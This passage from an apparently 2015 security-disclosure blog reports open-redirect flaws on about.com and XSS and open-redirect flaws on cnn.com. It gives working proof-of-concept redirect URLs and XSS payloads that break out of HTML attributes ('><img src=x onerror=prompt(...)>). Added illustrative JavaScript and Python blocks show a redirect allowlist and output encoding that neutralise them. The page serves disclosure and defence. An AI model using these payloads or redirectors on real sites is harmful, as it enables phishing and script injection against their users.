<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://www.inzeed.<wbr></wbr>com/netflix/stackoverflow</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
<div>
<a href="http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http%3A%2F%2Ft.<wbr></wbr>co%2fxvideos%2fsoso%2f%naver%<wbr></wbr>2fkickass.so</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net" target="_blank">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http://www.<wbr></wbr>diebiyi.com/xhamster/diply/<wbr></wbr>onclickads.net</a> </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b><br />
<a href="https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html</span></a></div>
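<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The redirectors listed above forward the browser to whatever the u or zu parameter contains. The following JavaScript is an added illustration, not about.com's code: it shows a destination check such a redirector could apply before issuing the redirect, next to the substring test it should replace. The allowlist policy, BASE, FALLBACK and all function names are assumptions, and the evil.example hosts are constructed.</span></div>

```javascript
// Added illustration, not about.com's code. BASE, ALLOWED_SUFFIXES, FALLBACK and
// all function names are assumptions; the evil.example hosts are constructed.
const BASE = "http://www.about.com/";   // origin the redirector is served from
const ALLOWED_SUFFIXES = ["about.com"]; // assumed policy: own domain and subdomains
const FALLBACK = "/";                   // where refused requests are sent instead

// Weak check: substring test on the raw parameter value.
function naiveIsAllowed(dest) {
  return dest.includes("about.com");
}

// Hardened check: parse the value as a browser would, then compare the host.
function isAllowedDestination(dest) {
  if (typeof dest !== "string" || dest.length === 0) return false;
  // Browsers silently drop tabs and newlines inside URLs; refuse them instead.
  if (/[\u0000-\u001f\u007f]/.test(dest)) return false;
  let url;
  try {
    // Resolving against BASE also normalises "//host" and "\\host" forms.
    url = new URL(dest, BASE);
  } catch (err) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  // "http://www.about.com@evil.example/" carries the trusted name as userinfo.
  if (url.username !== "" || url.password !== "") return false;
  const host = url.hostname.toLowerCase();
  // Exact match or a dot-delimited subdomain; "evilabout.com" does not pass.
  return ALLOWED_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Decide the Location header for a request to a u=/zu= style redirector.
function resolveRedirect(requestUrl, paramNames = ["u", "zu"]) {
  const refused = { allowed: false, location: FALLBACK };
  let params;
  try {
    params = new URL(requestUrl).searchParams; // percent-decodes the values
  } catch (err) {
    return refused;
  }
  for (const name of paramNames) {
    const values = params.getAll(name);
    if (values.length === 0) continue;
    // Repeated parameters can be read differently by different layers: refuse.
    if (values.length > 1) return refused;
    if (!isAllowedDestination(values[0])) return refused;
    return { allowed: true, location: new URL(values[0], BASE).href };
  }
  return refused;
}

// Sample requests: the second and third are the POC URLs from this post,
// the rest are constructed for the example.
const SAMPLE_REQUESTS = [
  "http://www.about.com/snf.htm?u=http://homerenovations.about.com/od/",
  "http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html",
  "http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow",
  "http://www.about.com/snf.htm?u=http://about.com.evil.example/",
  "http://www.about.com/snf.htm?u=//evil.example/about.com",
  "http://www.about.com/snf.htm?u=http://www.about.com%40evil.example/",
  "http://www.about.com/snf.htm?u=http://www.about.com/&u=http://evil.example/",
];

function runSamples() {
  return SAMPLE_REQUESTS.map((r) => Object.assign({ request: r }, resolveRedirect(r)));
}

for (const row of runSamples()) {
  console.log(row.allowed ? "ALLOW " : "REFUSE", row.request, "->", row.location);
}
```

An exact-host allowlist, or server-side destination IDs in place of URLs, is stricter than the suffix policy assumed here.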
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: white;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Feb/9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Feb/9</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/02/4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/02/4</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html</span></a></div>
</div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/02/03/about-group-xss-xfs/" target="_blank">https://hackertopic.wordpress.<wbr></wbr>com/2015/02/03/about-group-<wbr></wbr>xss-xfs/</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120845059171/about-group-xss-xfs" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120845059171/about-group-<wbr></wbr>xss-xfs</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itprompt.blogspot.com/2015/06/about-group-xss-xfs.html">http://itprompt.blogspot.com/<wbr></wbr>2015/06/about-group-xss-xfs.<wbr></wbr>html</a></span></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/03/24/about-group-%E8%B6%85%E8%BF%87-99-88-%E7%9A%84%E9%93%BE%E6%8E%A5%E5%AE%B9%E6%98%93%E9%81%AD%E5%8F%97-xss-%E5%92%8C-xfs-%E6%94%BB%E5%87%BB/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/03/24/about-group</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/803853789734793">https://www.facebook.com/websecuritiesnews/posts/803853789734793</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="https://twitter.com/essayjeans/status/607137800383655936"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/607137800383655936</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015566409245/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512015566409245/</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/687872271358693">https://www.facebook.com/pcwebsecurities/posts/687872271358693</a></span></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5">http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5</a></span></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/">https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/</span></a></div>
</div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-49395205992107193962015-06-05T23:32:00.000-07:002015-06-05T23:45:34.388-07:00CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities<div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o8BrybHMygU/VXKAp_-z4xI/AAAAAAAAA_Y/G2fV-L3HfdI/s1600/cnn_travel_xss.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-o8BrybHMygU/VXKAp_-z4xI/AAAAAAAAA_Y/G2fV-L3HfdI/s400/cnn_travel_xss.png" width="400" /></span></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://cnn.com</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"The Cable News Network (CNN) is an American basic cable and satellite television channel that is owned by the Turner Broadcasting System division of Time Warner. The 24-hour cable news channel was founded in 1980 by American media proprietor Ted Turner. Upon its launch, CNN was the first television channel to provide 24-hour news coverage, and was the first all-news television channel in the United States. While the news channel has numerous affiliates, CNN primarily broadcasts from the Time Warner Center in New York City, and studios in Washington, D.C. and Los Angeles, its headquarters at the CNN Center in Atlanta is only used for weekend programming. CNN is sometimes referred to as CNN/U.S. to distinguish the American channel from its international sister network, CNN International. As of August 2010, CNN is available in over 100 million U.S. households. Broadcast coverage of the U.S. channel extends to over 890,000 American hotel rooms, as well as carriage on cable and satellite providers throughout Canada. Globally, CNN programming airs through CNN International, which can be seen by viewers in over 212 countries and territories. As of February 2015, CNN is available to approximately 96,289,000 cable, satellite and, telco television households (82.7% of households with at least one television set) in the United States." (Wikipedia)</span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Discovered and Reported by:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/549420227021115392">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></div>
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CNN's website has security bugs that can be exploited through XSS (Cross Site Scripting) and Open Redirect (Unvalidated Redirects and Forwards) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">According to published news reports, CNN users have been hacked through both Open Redirect and XSS vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to E Hacker News on June 06, 2013, @BreakTheSec came across a diet spam campaign that leveraged an open redirect vulnerability in CNN, one of the top news organizations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">After the attack, CNN took measures to detect Open Redirect vulnerabilities. The measures held up well during the tests: almost no links on CNN's website are now vulnerable to Open Redirect attacks, and it takes a long time to find a new, unpatched Open Redirect vulnerability on the site.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CNN.com was hacked through an Open Redirect in 2013, while the XSS attacks happened in 2007.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>&lt;1&gt;</b> "The tweet apparently shows cyber criminals managed to leverage the open redirect security flaw in the CNN to redirect twitter users to the Diet spam websites."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-enV42qGMeAg/VKDIA4Pz_DI/AAAAAAAAAkw/_jtlQPYgQH4/s1600/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="291" src="http://2.bp.blogspot.com/-enV42qGMeAg/VKDIA4Pz_DI/AAAAAAAAAkw/_jtlQPYgQH4/s400/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Figure from ehackingnews.com</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">At the same time, the cybercriminals have also leveraged a similar vulnerability in a Yahoo domain to trick users into thinking that the links point to a trusted website.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Yahoo Open Redirects Vulnerabilities:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>&lt;2&gt;</b> CNN.com XSS hacked</span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2007/Aug/216" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2007/Aug/216</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar 0-day vulnerabilities have been found by other bug hunters before. CNN has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The following may be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the following web security issues have been published there: Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories and solution details related to XSS and URL Redirection vulnerabilities, as well as cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) CNN (cnn.com) Travel-City Related Links XSS (cross site scripting) Web Security Bugs</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">travel.cnn.com/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The flaws occur on the "/city/<wbr></wbr>all" pages. All links under this URL are vulnerable to XSS attacks, e.g.</span></div>
<div>
<a href="http://travel.cnn.com/city/all/all/washington?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/washington?page=0%2C1</span></a></div>
<div>
<a href="http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all?page=0%2C1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. According to Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><a href="http://4.bp.blogspot.com/-zZ_v5RyGwPw/VKDVnz3aiYI/AAAAAAAAAlQ/dcGepg4mmos/s1600/cnn_travel_city_xss1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-zZ_v5RyGwPw/VKDVnz3aiYI/AAAAAAAAAlQ/dcGepg4mmos/s400/cnn_travel_city_xss1.png" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/tokyo/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all</a>' /"&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/bangkok/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/bangkok/all</a>' /"&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
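<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (not code from the original advisory or from CNN): the PoC suffix above is built to break out of a quoted HTML attribute. The pager template below is a hypothetical stand-in for a page that echoes the request path; it shows the unencoded form beside one that encodes for the URL and attribute contexts, and audits both outputs with Python's standard-library HTML tokenizer.</span></div>

```python
"""Attribute-context reflection: unencoded template vs. context-aware encoding.
Added illustration; the template is hypothetical, not CNN's code."""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Request path carrying the PoC suffix shown on this page.
POC_PATH = "/city/all/all/tokyo/all' /\"><img src=x onerror=prompt(/justqdjing/)>"


def render_unsafe(path):
    """Vulnerable pattern: the raw request path is concatenated into href."""
    return '<a class="pager" href="' + path + '?page=0%2C1">next</a>'


def render_safe(path):
    """Encode for each context in order: URL path first, then HTML attribute."""
    url = quote(path, safe="/") + "?page=0%2C1"  # ' " < > and space become %XX
    return '<a class="pager" href="' + html.escape(url, quote=True) + '">next</a>'


class _Audit(HTMLParser):
    """Collects every start tag and every on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name, value))


def audit(markup):
    """Tokenize markup and return (start_tags, event_handlers)."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        out = render(POC_PATH)
        tags, handlers = audit(out)
        print(render.__name__, "->", out)
        print("  start tags:", tags, "| event handlers:", handlers)
```

<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A regression test for a template like this can assert that the only start tag in the output is the one the template itself wrote.</span></div>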
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) <span style="line-height: 21.7777786254883px; text-align: justify;">PoC Video:</span></span></b></div>
<div>
